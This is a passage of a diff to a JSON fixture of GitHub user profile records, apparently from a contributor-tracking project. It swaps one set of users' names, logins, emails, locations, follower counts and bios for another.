+ "node_id": "MDQ6VXNlcjExNjYwMjM=", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1498, + "pk": 6786, "fields": { - "nest_created_at": "2024-09-11T23:37:27.035Z", - "nest_updated_at": "2024-09-11T23:37:27.035Z", - "name": "Scott Kempf", - "login": "ModestMannfred", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/158148407?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:48:12.112Z", + "nest_updated_at": "2024-09-22T18:50:45.492Z", + "name": "Joseph Musser", + "login": "jnm2", + "email": "me@jnm2.com", + "avatar_url": "https://avatars.githubusercontent.com/u/8040367?v=4", + "company": "@Techsola", + "location": "Elizabethtown, PA", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2024-01-30T09:07:27Z", - "updated_at": "2024-06-19T08:59:42Z", - "node_id": "U_kgDOCW0nNw", - "bio": "", + "following_count": 13, + "followers_count": 115, + "public_gists_count": 147, + "public_repositories_count": 143, + "created_at": "2014-07-01T19:00:03Z", + "updated_at": "2024-09-17T12:34:35Z", + "node_id": "MDQ6VXNlcjgwNDAzNjc=", + "bio": "Partner at @Techsola. OSS maintainer. Working on new C# language features. 6-year Microsoft MVP.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "jnm236" } }, { "model": "github.user", - "pk": 1499, + "pk": 6787, "fields": { - "nest_created_at": "2024-09-11T23:37:29.541Z", - "nest_updated_at": "2024-09-11T23:37:32.830Z", - "name": "Christian Poveda Ruiz", - "login": "pvdrz", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/31802960?v=4", + "nest_created_at": "2024-09-22T07:48:12.430Z", + "nest_updated_at": "2024-09-22T18:50:45.814Z", + "name": "KYEBOSH", + "login": "kyebosh", + "email": "kyebosh@hotmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/8413271?v=4", "company": "", - "location": "", + "location": "Newcastle, Australia", "collaborators_count": 0, - "following_count": 46, - "followers_count": 60, - "public_gists_count": 16, - "public_repositories_count": 25, - "created_at": "2017-09-09T16:29:00Z", - "updated_at": "2024-09-07T15:51:44Z", - "node_id": "MDQ6VXNlcjMxODAyOTYw", + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2014-08-11T05:37:10Z", + "updated_at": "2022-05-12T11:14:58Z", + "node_id": "MDQ6VXNlcjg0MTMyNzE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -397728,124 +655602,124 @@ }, { "model": "github.user", - "pk": 1500, + "pk": 6788, "fields": { - "nest_created_at": "2024-09-11T23:37:33.639Z", - "nest_updated_at": "2024-09-11T23:37:33.639Z", - "name": "Sebastian Ziebell", - "login": "justahero", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1305185?v=4", - "company": "", - "location": "Berlin", + "nest_created_at": "2024-09-22T07:48:12.764Z", + "nest_updated_at": "2024-09-22T18:50:46.139Z", + "name": "Kagami Sascha Rosylight", + "login": "saschanaz", + "email": "saschanaz@outlook.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3396686?v=4", + "company": "@mozilla", + "location": "Berlin, Germany", "collaborators_count": 0, - "following_count": 61, - "followers_count": 48, - "public_gists_count": 18, - "public_repositories_count": 55, - "created_at": "2012-01-04T22:37:09Z", - "updated_at": "2024-08-13T13:36:35Z", - "node_id": "MDQ6VXNlcjEzMDUxODU=", - "bio": "", + "following_count": 25, + "followers_count": 254, + "public_gists_count": 41, + "public_repositories_count": 388, + "created_at": "2013-01-27T11:50:16Z", + "updated_at": "2024-09-21T20:21:53Z", + "node_id": "MDQ6VXNlcjMzOTY2ODY=", + "bio": "Some web things", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1501, + "pk": 6789, "fields": { - "nest_created_at": "2024-09-11T23:37:54.374Z", - "nest_updated_at": "2024-09-11T23:37:54.374Z", - "name": "Patrik Svensson", - "login": "patriksvensson", + "nest_created_at": "2024-09-22T07:48:13.073Z", + "nest_updated_at": "2024-09-22T18:50:46.451Z", + "name": "Kanit Wongsuphasawat", + "login": "kanitw", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/357872?v=4", - "company": "@spectresystems", - "location": "Sweden", + "avatar_url": "https://avatars.githubusercontent.com/u/111269?v=4", + "company": "@databricks ", + "location": "Seattle", "collaborators_count": 0, - "following_count": 87, - "followers_count": 811, - "public_gists_count": 35, - "public_repositories_count": 57, - "created_at": "2010-08-08T18:56:06Z", - "updated_at": "2024-09-11T09:03:10Z", - "node_id": "MDQ6VXNlcjM1Nzg3Mg==", - "bio": "Father. Husband. Programmer. Creator of Cake (@cake-build) and Spectre.Console (@spectreconsole). Microsoft MVP. GitHub Star alumni. I like OSS, C#, & Rust", - "is_hireable": true, - "twitter_username": "firstdrafthell" + "following_count": 13, + "followers_count": 457, + "public_gists_count": 14, + "public_repositories_count": 52, + "created_at": "2009-08-03T04:56:14Z", + "updated_at": "2024-08-30T20:13:24Z", + "node_id": "MDQ6VXNlcjExMTI2OQ==", + "bio": "Visualization at @databricks . Co-author of Vega-Lite, Swift Charts, Data Voyager, and Graph Visualization in TensorBoard. Formerly at @uwdata and Apple.", + "is_hireable": false, + "twitter_username": "kanitw" } }, { "model": "github.user", - "pk": 1502, + "pk": 6790, "fields": { - "nest_created_at": "2024-09-11T23:37:56.431Z", - "nest_updated_at": "2024-09-11T23:37:56.431Z", - "name": "MAYANK YADAV", - "login": "yadavmayank742", + "nest_created_at": "2024-09-22T07:48:13.385Z", + "nest_updated_at": "2024-09-22T18:50:46.783Z", + "name": "Karl Taylor", + "login": "k4r1", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/41020797?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/16408267?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, + "following_count": 1, + "followers_count": 19, "public_gists_count": 1, "public_repositories_count": 11, - "created_at": "2018-07-09T17:18:43Z", - "updated_at": "2024-06-28T04:26:15Z", - "node_id": "MDQ6VXNlcjQxMDIwNzk3", - "bio": "An enthusiastic student: currently pursuing my MS in Cybersecurity from Amrita University Kerala.\r\nKeenly interested in Software Development and Cyber Security.", - "is_hireable": true, + "created_at": "2015-12-23T02:08:54Z", + "updated_at": "2024-08-14T05:38:03Z", + "node_id": "MDQ6VXNlcjE2NDA4MjY3", + "bio": "", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1503, + "pk": 6791, "fields": { - "nest_created_at": "2024-09-11T23:37:57.249Z", - "nest_updated_at": "2024-09-11T23:37:57.249Z", - "name": "Ognyan Dimitrov", - "login": "ognyandim", - "email": "ognyandim@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/2851260?v=4", - "company": "KPMG ITS OOD", - "location": "Sofia, Bulgaria", + "nest_created_at": "2024-09-22T07:48:13.707Z", + "nest_updated_at": "2024-09-22T18:50:47.105Z", + "name": "Kasper Fock", + "login": "kasper-f", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2758723?v=4", + "company": "ASERGO", + "location": "Denmark", "collaborators_count": 0, - "following_count": 6, - "followers_count": 3, - "public_gists_count": 4, - "public_repositories_count": 5, - "created_at": "2012-11-21T06:50:32Z", - "updated_at": "2024-08-17T13:29:17Z", - "node_id": "MDQ6VXNlcjI4NTEyNjA=", - "bio": "A disciple of Jesus, husband, father of three, software developer and physicist.", + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 15, + "created_at": "2012-11-09T12:18:48Z", + "updated_at": "2024-05-29T09:45:39Z", + "node_id": "MDQ6VXNlcjI3NTg3MjM=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1504, + "pk": 6792, "fields": { - "nest_created_at": "2024-09-11T23:37:58.105Z", - "nest_updated_at": "2024-09-11T23:37:58.105Z", - "name": "Klaus Ziegler", - "login": "SpessartZiegler", + "nest_created_at": "2024-09-22T07:48:14.022Z", + "nest_updated_at": "2024-09-22T18:50:47.439Z", + "name": "Katie Chapman", + "login": "SemanticallyNull", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/52484247?v=4", - "company": "Bosch Rexroth AG", - "location": "Lohr", + "avatar_url": "https://avatars.githubusercontent.com/u/479354?v=4", + "company": "@circleci", + "location": "Dublin, Ireland", "collaborators_count": 0, - "following_count": 1, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2019-07-03T06:49:17Z", - "updated_at": "2024-09-04T15:08:43Z", - "node_id": "MDQ6VXNlcjUyNDg0MjQ3", + "following_count": 22, + "followers_count": 85, + "public_gists_count": 43, + "public_repositories_count": 67, + "created_at": "2010-11-12T20:34:10Z", + "updated_at": "2024-09-16T16:19:22Z", + "node_id": "MDQ6VXNlcjQ3OTM1NA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -397853,24 +655727,24 @@ }, { "model": "github.user", - "pk": 1505, + "pk": 6793, "fields": { - "nest_created_at": "2024-09-11T23:37:59.779Z", - "nest_updated_at": "2024-09-18T18:58:29.115Z", - "name": "Agustin Isasmendi", - "login": "isasmendiagus", - "email": "isasmendi.agus@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/17660235?v=4", + "nest_created_at": "2024-09-22T07:48:14.329Z", + "nest_updated_at": "2024-09-22T18:50:47.753Z", + "name": "Kenneth Redler", + "login": "kennethredler", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/22832065?v=4", "company": "", - "location": "Spain, Madrid", + "location": "MN, USA", "collaborators_count": 0, - "following_count": 13, - "followers_count": 5, + "following_count": 3, + "followers_count": 7, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2016-03-05T01:06:48Z", - "updated_at": "2024-09-04T17:44:32Z", - "node_id": "MDQ6VXNlcjE3NjYwMjM1", + "public_repositories_count": 6, + "created_at": "2016-10-14T06:54:07Z", + "updated_at": "2024-07-03T18:41:51Z", + "node_id": "MDQ6VXNlcjIyODMyMDY1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -397878,74 +655752,74 @@ }, { "model": "github.user", - "pk": 1506, + "pk": 6794, "fields": { - "nest_created_at": "2024-09-11T23:38:28.664Z", - "nest_updated_at": "2024-09-11T23:38:28.664Z", - "name": "Tom Schindl", - "login": "tomsontom", - "email": "tom.schindl@bestsolution.at", - "avatar_url": "https://avatars.githubusercontent.com/u/52631?v=4", - "company": "BestSolution.at", - "location": "Innsbruck", + "nest_created_at": "2024-09-22T07:48:14.650Z", + "nest_updated_at": "2024-09-22T18:50:48.062Z", + "name": "Kid", + "login": "kidonng", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/44045911?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 99, - "public_gists_count": 12, - "public_repositories_count": 66, - "created_at": "2009-02-07T19:20:04Z", - "updated_at": "2024-09-06T16:56:23Z", - "node_id": "MDQ6VXNlcjUyNjMx", - "bio": "", + "following_count": 22, + "followers_count": 336, + "public_gists_count": 3, + "public_repositories_count": 119, + "created_at": "2018-10-11T02:55:17Z", + "updated_at": "2024-09-13T11:58:05Z", + "node_id": "MDQ6VXNlcjQ0MDQ1OTEx", + "bio": "THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1507, + "pk": 6795, "fields": { - "nest_created_at": "2024-09-11T23:38:29.902Z", - "nest_updated_at": "2024-09-11T23:38:29.902Z", - "name": "PrettyCoffee", - "login": "PrettyCoffee", + "nest_created_at": "2024-09-22T07:48:14.968Z", + "nest_updated_at": "2024-09-22T18:50:48.374Z", + "name": "Kieren Johnstone", + "login": "kierenj", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/66521452?v=4", - "company": "", - "location": "germany", + "avatar_url": "https://avatars.githubusercontent.com/u/82343?v=4", + "company": "@RedRiverSoftware ", + "location": "Horsham, UK", "collaborators_count": 0, - "following_count": 9, - "followers_count": 56, - "public_gists_count": 1, - "public_repositories_count": 27, - "created_at": "2020-06-06T13:36:15Z", - "updated_at": "2024-09-03T19:03:33Z", - "node_id": "MDQ6VXNlcjY2NTIxNDUy", - "bio": "React webdev. ⚛ CSS is fun. 🌈", + "following_count": 6, + "followers_count": 14, + "public_gists_count": 20, + "public_repositories_count": 50, + "created_at": "2009-05-08T08:32:27Z", + "updated_at": "2024-09-18T08:57:11Z", + "node_id": "MDQ6VXNlcjgyMzQz", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1508, + "pk": 6796, "fields": { - "nest_created_at": "2024-09-11T23:39:16.871Z", - "nest_updated_at": "2024-09-11T23:39:16.871Z", - "name": "", - "login": "Cor-J", + "nest_created_at": "2024-09-22T07:48:15.280Z", + "nest_updated_at": "2024-09-22T18:50:48.679Z", + "name": "Fridtjof Mund", + "login": "fridtjof", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/52933655?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/2780577?v=4", "company": "", - "location": "", + "location": "Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2019-07-15T18:52:26Z", - "updated_at": "2024-08-12T11:56:44Z", - "node_id": "MDQ6VXNlcjUyOTMzNjU1", + "following_count": 34, + "followers_count": 28, + "public_gists_count": 6, + "public_repositories_count": 47, + "created_at": "2012-11-12T18:44:34Z", + "updated_at": "2024-09-07T15:31:03Z", + "node_id": "MDQ6VXNlcjI3ODA1Nzc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -397953,99 +655827,99 @@ }, { "model": "github.user", - "pk": 1509, + "pk": 6797, "fields": { - "nest_created_at": "2024-09-11T23:39:20.221Z", - "nest_updated_at": "2024-09-11T23:39:20.221Z", - "name": "Nils Hanke", - "login": "Nirusu", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/26608194?v=4", - "company": "", - "location": "Germany", + "nest_created_at": "2024-09-22T07:48:15.597Z", + "nest_updated_at": "2024-09-22T18:50:48.985Z", + "name": "Friedrich von Never", + "login": "ForNeVeR", + "email": "friedrich@fornever.me", + "avatar_url": "https://avatars.githubusercontent.com/u/92793?v=4", + "company": "@JetBrains", + "location": "Amsterdam, Netherlands", "collaborators_count": 0, - "following_count": 19, - "followers_count": 22, - "public_gists_count": 1, - "public_repositories_count": 57, - "created_at": "2017-03-22T19:04:04Z", - "updated_at": "2024-09-02T10:28:25Z", - "node_id": "MDQ6VXNlcjI2NjA4MTk0", - "bio": "", + "following_count": 251, + "followers_count": 589, + "public_gists_count": 15, + "public_repositories_count": 468, + "created_at": "2009-06-07T10:10:59Z", + "updated_at": "2024-09-09T22:21:46Z", + "node_id": "MDQ6VXNlcjkyNzkz", + "bio": "Engineer, programmer, gentleman. Cosmic revenant.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "fvnever" } }, { "model": "github.user", - "pk": 1510, + "pk": 6798, "fields": { - "nest_created_at": "2024-09-11T23:39:36.675Z", - "nest_updated_at": "2024-09-11T23:39:36.675Z", - "name": "Zafer Balkan", - "login": "zbalkan", - "email": "zafer@zaferbalkan.com", - "avatar_url": "https://avatars.githubusercontent.com/u/39981909?v=4", - "company": "", - "location": "Tallinn, Estonia", + "nest_created_at": "2024-09-22T07:48:15.926Z", + "nest_updated_at": "2024-09-22T18:50:49.310Z", + "name": "Gabriel Dugny", + "login": "GabDug", + "email": "git@dugny.me", + "avatar_url": "https://avatars.githubusercontent.com/u/1116720?v=4", + "company": "@ManoManoTech", + "location": "France", "collaborators_count": 0, - "following_count": 343, - "followers_count": 32, - "public_gists_count": 27, - "public_repositories_count": 110, - "created_at": "2018-06-06T06:14:51Z", - "updated_at": "2024-09-05T07:43:36Z", - "node_id": "MDQ6VXNlcjM5OTgxOTA5", - "bio": "IT Pro, Cybersecurity guy", + "following_count": 82, + "followers_count": 45, + "public_gists_count": 1, + "public_repositories_count": 62, + "created_at": "2011-10-10T15:22:21Z", + "updated_at": "2024-09-01T11:22:21Z", + "node_id": "MDQ6VXNlcjExMTY3MjA=", + "bio": "", "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1511, + "pk": 6799, "fields": { - "nest_created_at": "2024-09-11T23:39:37.489Z", - "nest_updated_at": "2024-09-18T18:58:50.779Z", - "name": "Tom van den Berg", - "login": "tom171296", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/12030148?v=4", - "company": "Info Support", - "location": "", + "nest_created_at": "2024-09-22T07:48:16.234Z", + "nest_updated_at": "2024-09-22T18:50:49.625Z", + "name": "Gabriel Machado", + "login": "gmsantos", + "email": "contato@gmsantos.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1991286?v=4", + "company": "@protectai", + "location": "Berlin, Germany", "collaborators_count": 0, - "following_count": 2, - "followers_count": 7, - "public_gists_count": 1, - "public_repositories_count": 15, - "created_at": "2015-04-20T08:34:13Z", - "updated_at": "2024-06-16T12:48:29Z", - "node_id": "MDQ6VXNlcjEyMDMwMTQ4", + "following_count": 100, + "followers_count": 164, + "public_gists_count": 10, + "public_repositories_count": 85, + "created_at": "2012-07-17T12:39:40Z", + "updated_at": "2024-09-18T10:56:50Z", + "node_id": "MDQ6VXNlcjE5OTEyODY=", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "gmsantos__" } }, { "model": "github.user", - "pk": 1512, + "pk": 6800, "fields": { - "nest_created_at": "2024-09-11T23:39:43.254Z", - "nest_updated_at": "2024-09-18T18:58:55.164Z", - "name": "Qasim Sajid", - "login": "qasim-sajid-snkeos", + "nest_created_at": "2024-09-22T07:48:16.542Z", + "nest_updated_at": "2024-09-22T18:50:49.935Z", + "name": "Gary Dexter", + "login": "garydex", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/149792497?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1895375?v=4", "company": "", - "location": "Munich", + "location": "London, UK", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-11-03T12:07:20Z", - "updated_at": "2024-07-02T09:14:37Z", - "node_id": "U_kgDOCO2m8Q", + "public_repositories_count": 3, + "created_at": "2012-06-26T18:32:26Z", + "updated_at": "2024-05-24T13:16:54Z", + "node_id": "MDQ6VXNlcjE4OTUzNzU=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -398053,149 +655927,149 @@ }, { "model": "github.user", - "pk": 1513, + "pk": 6801, "fields": { - "nest_created_at": "2024-09-11T23:40:12.742Z", - "nest_updated_at": "2024-09-11T23:40:12.742Z", - "name": "Florian Angermeir", - "login": "angrymeir", + "nest_created_at": "2024-09-22T07:48:16.854Z", + "nest_updated_at": "2024-09-22T18:50:50.249Z", + "name": "Gary Roberts", + "login": "thegaryroberts", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/16398152?v=4", - "company": "fortiss", + "avatar_url": "https://avatars.githubusercontent.com/u/12859748?v=4", + "company": "", "location": "", "collaborators_count": 0, - "following_count": 27, - "followers_count": 23, + "following_count": 1, + "followers_count": 4, "public_gists_count": 0, - "public_repositories_count": 13, - "created_at": "2015-12-22T08:05:33Z", - "updated_at": "2024-08-20T11:36:54Z", - "node_id": "MDQ6VXNlcjE2Mzk4MTUy", - "bio": "Researcher at fortiss & PhD student at BTH", + "public_repositories_count": 0, + "created_at": "2015-06-12T11:38:44Z", + "updated_at": "2024-08-30T07:58:48Z", + "node_id": "MDQ6VXNlcjEyODU5NzQ4", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1514, + "pk": 6802, "fields": { - "nest_created_at": "2024-09-11T23:40:13.553Z", - "nest_updated_at": "2024-09-11T23:40:13.553Z", - "name": "Phil LaFrance", - "login": "coveros-phil", + "nest_created_at": "2024-09-22T07:48:17.171Z", + "nest_updated_at": "2024-09-22T18:50:50.564Z", + "name": "Gaurav Kamath", + "login": "st0le", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/114023548?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3803209?v=4", + "company": "Microsoft", + "location": "Redmond, WA", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2022-09-20T19:15:24Z", - "updated_at": "2024-09-10T22:21:49Z", - "node_id": "U_kgDOBsvcfA", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "following_count": 63, + "followers_count": 21, + "public_gists_count": 101, + "public_repositories_count": 59, + "created_at": "2013-03-07T22:42:19Z", + "updated_at": "2024-09-09T16:10:10Z", + "node_id": "MDQ6VXNlcjM4MDMyMDk=", + "bio": "I solve stuff", + "is_hireable": true, + "twitter_username": "kamathgaurav" } }, { "model": "github.user", - "pk": 1515, + "pk": 6803, "fields": { - "nest_created_at": "2024-09-11T23:40:27.709Z", - "nest_updated_at": "2024-09-12T00:08:11.349Z", - "name": "Salve J. Nilsen", - "login": "sjn", - "email": "sjn@cpan.org", - "avatar_url": "https://avatars.githubusercontent.com/u/54637?v=4", - "company": "", - "location": "Oslo, Norway", + "nest_created_at": "2024-09-22T07:48:17.481Z", + "nest_updated_at": "2024-09-22T18:50:50.878Z", + "name": "George Cheng", + "login": "Gerhut", + "email": "Gerhut@GMail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2500247?v=4", + "company": "@microsoft", + "location": "", "collaborators_count": 0, - "following_count": 6, - "followers_count": 35, - "public_gists_count": 7, - "public_repositories_count": 112, - "created_at": "2009-02-15T01:50:34Z", - "updated_at": "2024-08-21T16:39:18Z", - "node_id": "MDQ6VXNlcjU0NjM3", - "bio": "Some guy in Oslo, Norway.", + "following_count": 142, + "followers_count": 169, + "public_gists_count": 45, + "public_repositories_count": 304, + "created_at": "2012-10-06T12:50:01Z", + "updated_at": "2024-09-18T23:56:45Z", + "node_id": "MDQ6VXNlcjI1MDAyNDc=", + "bio": "A fan of @Dafrok ", "is_hireable": false, - "twitter_username": "sjoshuan" + "twitter_username": "gerhut" } }, { "model": "github.user", - "pk": 1516, + "pk": 6804, "fields": { - "nest_created_at": "2024-09-11T23:40:31.908Z", - "nest_updated_at": "2024-09-18T18:59:14.750Z", - "name": "ashley williams", - "login": "ashleygwilliams", + "nest_created_at": "2024-09-22T07:48:17.803Z", + "nest_updated_at": "2024-09-22T18:50:51.193Z", + "name": "George MacKerron", + "login": "jawj", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1163554?v=4", - "company": "@axodotdev", - "location": "ATX", + "avatar_url": "https://avatars.githubusercontent.com/u/141620?v=4", + "company": "", + "location": "Brighton, UK", "collaborators_count": 0, - "following_count": 1, - "followers_count": 4961, - "public_gists_count": 176, - "public_repositories_count": 373, - "created_at": "2011-10-31T21:36:05Z", - "updated_at": "2024-09-16T22:03:37Z", - "node_id": "MDQ6VXNlcjExNjM1NTQ=", - "bio": "a mess like this is easily five to ten years ahead of its time. former @rustlang core.", + "following_count": 10, + "followers_count": 202, + "public_gists_count": 9, + "public_repositories_count": 109, + "created_at": "2009-10-19T11:37:52Z", + "updated_at": "2024-09-10T15:49:30Z", + "node_id": "MDQ6VXNlcjE0MTYyMA==", + "bio": "Academic economist and full-stack developer", "is_hireable": false, - "twitter_username": "ag_dubs" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1517, + "pk": 6805, "fields": { - "nest_created_at": "2024-09-11T23:40:45.943Z", - "nest_updated_at": "2024-09-11T23:40:45.943Z", - "name": "Justin", - "login": "TheMagicNacho", + "nest_created_at": "2024-09-22T07:48:18.115Z", + "nest_updated_at": "2024-09-22T18:50:51.520Z", + "name": "Georgii Dolzhykov", + "login": "thorn0", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6934389?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/94334?v=4", "company": "", - "location": "", + "location": "Kyiv, Ukraine", "collaborators_count": 0, - "following_count": 15, - "followers_count": 11, - "public_gists_count": 7, - "public_repositories_count": 88, - "created_at": "2014-03-12T21:04:16Z", - "updated_at": "2024-08-25T18:06:24Z", - "node_id": "MDQ6VXNlcjY5MzQzODk=", - "bio": "Nacho average developer; looking for the queso to my microchip.", + "following_count": 34, + "followers_count": 74, + "public_gists_count": 1, + "public_repositories_count": 50, + "created_at": "2009-06-11T12:42:39Z", + "updated_at": "2024-07-03T16:37:16Z", + "node_id": "MDQ6VXNlcjk0MzM0", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1518, + "pk": 6806, "fields": { - "nest_created_at": "2024-09-11T23:40:46.758Z", - "nest_updated_at": "2024-09-18T18:59:22.350Z", - "name": "Mark Sturdevant", - "login": "markstur", - "email": "mark.sturdevant@ibm.com", - "avatar_url": "https://avatars.githubusercontent.com/u/7129103?v=4", + "nest_created_at": "2024-09-22T07:48:18.430Z", + "nest_updated_at": "2024-09-22T18:50:51.873Z", + "name": "Gernovich Valentin", + "login": "gernovich", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2571555?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 60, - "public_gists_count": 1, - "public_repositories_count": 135, - "created_at": "2014-04-01T16:04:43Z", - "updated_at": "2024-06-20T10:20:07Z", - "node_id": "MDQ6VXNlcjcxMjkxMDM=", + "following_count": 2, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2012-10-16T09:23:47Z", + "updated_at": "2024-08-08T09:44:39Z", + "node_id": "MDQ6VXNlcjI1NzE1NTU=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -398203,24 +656077,24 @@ }, { "model": "github.user", - "pk": 1519, + "pk": 6807, "fields": { - "nest_created_at": "2024-09-11T23:40:48.968Z", - "nest_updated_at": "2024-09-11T23:40:48.968Z", - "name": "Priti Desai", - "login": "pritidesai", - "email": "pdesai@us.ibm.com", - "avatar_url": "https://avatars.githubusercontent.com/u/206285?v=4", + "nest_created_at": "2024-09-22T07:48:18.783Z", + "nest_updated_at": "2024-09-22T18:50:52.183Z", + "name": "Gert Vilain", + "login": "GertVil", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7761779?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 4, - "followers_count": 32, - "public_gists_count": 145, - "public_repositories_count": 102, - "created_at": "2010-02-18T20:57:39Z", - "updated_at": "2024-08-29T19:49:57Z", - "node_id": "MDQ6VXNlcjIwNjI4NQ==", + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 34, + "created_at": "2014-06-01T17:24:48Z", + "updated_at": "2024-05-24T06:40:29Z", + "node_id": "MDQ6VXNlcjc3NjE3Nzk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -398228,74 +656102,74 @@ }, { "model": "github.user", - "pk": 1520, + "pk": 6808, "fields": { - "nest_created_at": "2024-09-11T23:41:38.629Z", - "nest_updated_at": "2024-09-11T23:41:38.629Z", - "name": "Simone Lazzaris", - "login": "SimoneLazzaris", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11316967?v=4", - "company": "vChain Inc", - "location": "Bergamo, Italy", + "nest_created_at": "2024-09-22T07:48:19.093Z", + "nest_updated_at": "2024-09-22T18:50:52.511Z", + "name": "Gleb Bahmutov", + "login": "bahmutov", + "email": "gleb.bahmutov@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2212006?v=4", + "company": "", + "location": "Boston, MA", "collaborators_count": 0, - "following_count": 1, - "followers_count": 7, - "public_gists_count": 0, - "public_repositories_count": 48, - "created_at": "2015-03-04T16:20:21Z", - "updated_at": "2024-09-05T18:55:11Z", - "node_id": "MDQ6VXNlcjExMzE2OTY3", - "bio": "", + "following_count": 25, + "followers_count": 4778, + "public_gists_count": 31, + "public_repositories_count": 1240, + "created_at": "2012-08-24T14:34:53Z", + "updated_at": "2024-05-29T15:58:06Z", + "node_id": "MDQ6VXNlcjIyMTIwMDY=", + "bio": "JavaScript ninja, image processing expert, software quality fanatic. Sr Director of Engineering at Mercari US. MS MVP for OSS work, GitHub Star.", "is_hireable": false, - "twitter_username": "SimoneLazzaris" + "twitter_username": "bahmutov" } }, { "model": "github.user", - "pk": 1521, + "pk": 6809, "fields": { - "nest_created_at": "2024-09-11T23:41:41.057Z", - "nest_updated_at": "2024-09-11T23:41:41.057Z", - "name": "", - "login": "celek", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5641827?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:48:19.412Z", + "nest_updated_at": "2024-09-22T18:50:52.829Z", + "name": "Gorkem Ercan", + "login": "gorkem", + "email": "gorkem.ercan@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/82738?v=4", + "company": "Jozu", + "location": "Canada", "collaborators_count": 0, "following_count": 2, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 23, - "created_at": "2013-10-08T20:53:33Z", - "updated_at": "2024-09-11T13:19:50Z", - "node_id": "MDQ6VXNlcjU2NDE4Mjc=", + "followers_count": 103, + "public_gists_count": 8, + "public_repositories_count": 137, + "created_at": "2009-05-09T14:25:39Z", + "updated_at": "2024-08-26T11:22:17Z", + "node_id": "MDQ6VXNlcjgyNzM4", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "GorkemErcan" } }, { "model": "github.user", - "pk": 1522, + "pk": 6810, "fields": { - "nest_created_at": "2024-09-11T23:41:49.260Z", - "nest_updated_at": 